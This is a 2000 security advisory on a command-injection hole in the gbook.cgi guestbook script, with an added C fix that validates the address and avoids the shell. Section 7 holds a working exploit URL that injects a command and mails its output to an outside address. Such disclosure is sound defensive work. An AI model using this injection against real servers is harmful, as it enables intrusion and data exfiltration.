
Title: gbook.cgi remote command execution vulnerability
Released by: Bill Kendrick
Date: 10th November 2000
   Bug Report



1. Name: gbook.cgi remote command execution vulnerability

2. Release Date: 2000.11.10

3. Affected Application:

  GBook - A web site guestbook

     By Bill Kendrick

     kendrick@zippy.sonoma.edu

     http://zippy.sonoma.edu/kendrick/

4. Author: mat@hacksware.com

5. Type: Input validation Error



6. Explanation

 gbook.cgi is used by some web sites.

 The _MAILTO parameter can be set by the requester, and popen is called to execute the mail command with it.

 If ';' is used in the _MAILTO value, arbitrary commands can be executed with it.

 It's so trivial. :)
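
 The fix for the flaw explained above, as an added example (not GBook's own code and not part of the original advisory): an allow-list check on the recipient address, and a send routine that runs the mailer with execl instead of popen so no shell parses the value. The names mailto_is_safe and send_notice, the sendmail path and the shape of the vulnerable call shown in the comment are assumptions.

```c
#include <ctype.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define SENDMAIL "/usr/sbin/sendmail"   /* assumed path, adjust per system */

/* Pattern the advisory describes (assumed shape, not GBook's source):
 *   sprintf(cmd, "mail %s", mailto); popen(cmd, "w");
 * popen() hands cmd to /bin/sh, so ';' or '|' in mailto starts a new command. */

/* Allow-list: alphanumerics plus . _ + - and exactly one interior '@'. */
int mailto_is_safe(const char *addr)
{
    size_t n = strlen(addr);
    int at = 0;
    if (n == 0 || n > 254 || addr[0] == '-' || addr[0] == '@' || addr[n - 1] == '@')
        return 0;               /* leading '-' would be read as an option */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c == '@') at++;
        else if (!isalnum(c) && !strchr("._+-", c)) return 0;
    }
    return at == 1;
}

/* Hardened send: no shell; the address travels as data on sendmail's stdin. */
int send_notice(const char *addr, const char *body)
{
    int fd[2], st;
    if (!mailto_is_safe(addr) || pipe(fd) != 0) return -1;
    signal(SIGPIPE, SIG_IGN);   /* a failed exec must not kill the CGI on write */
    pid_t pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {             /* child: pipe becomes stdin, then exec mailer */
        dup2(fd[0], STDIN_FILENO); close(fd[0]); close(fd[1]);
        execl(SENDMAIL, "sendmail", "-t", "-i", (char *)NULL);
        _exit(127);
    }
    close(fd[0]);
    FILE *out = fdopen(fd[1], "w");
    if (out) { fprintf(out, "To: %s\nSubject: guestbook entry\n\n%s\n", addr, body); fclose(out); }
    else close(fd[1]);
    waitpid(pid, &st, 0);
    return (WIFEXITED(st) && WEXITSTATUS(st) == 0) ? 0 : -1;
}
```

 The allow-list also rejects newlines, which matters here because the address is written into a mail header.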

7. Exploits

 This exploit executes the "ps -ax" command and sends the result to haha@yaho.com.



 wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"





=================================================

|               mat@hacksware.com               |

|             http://hacksware.com              |

=================================================







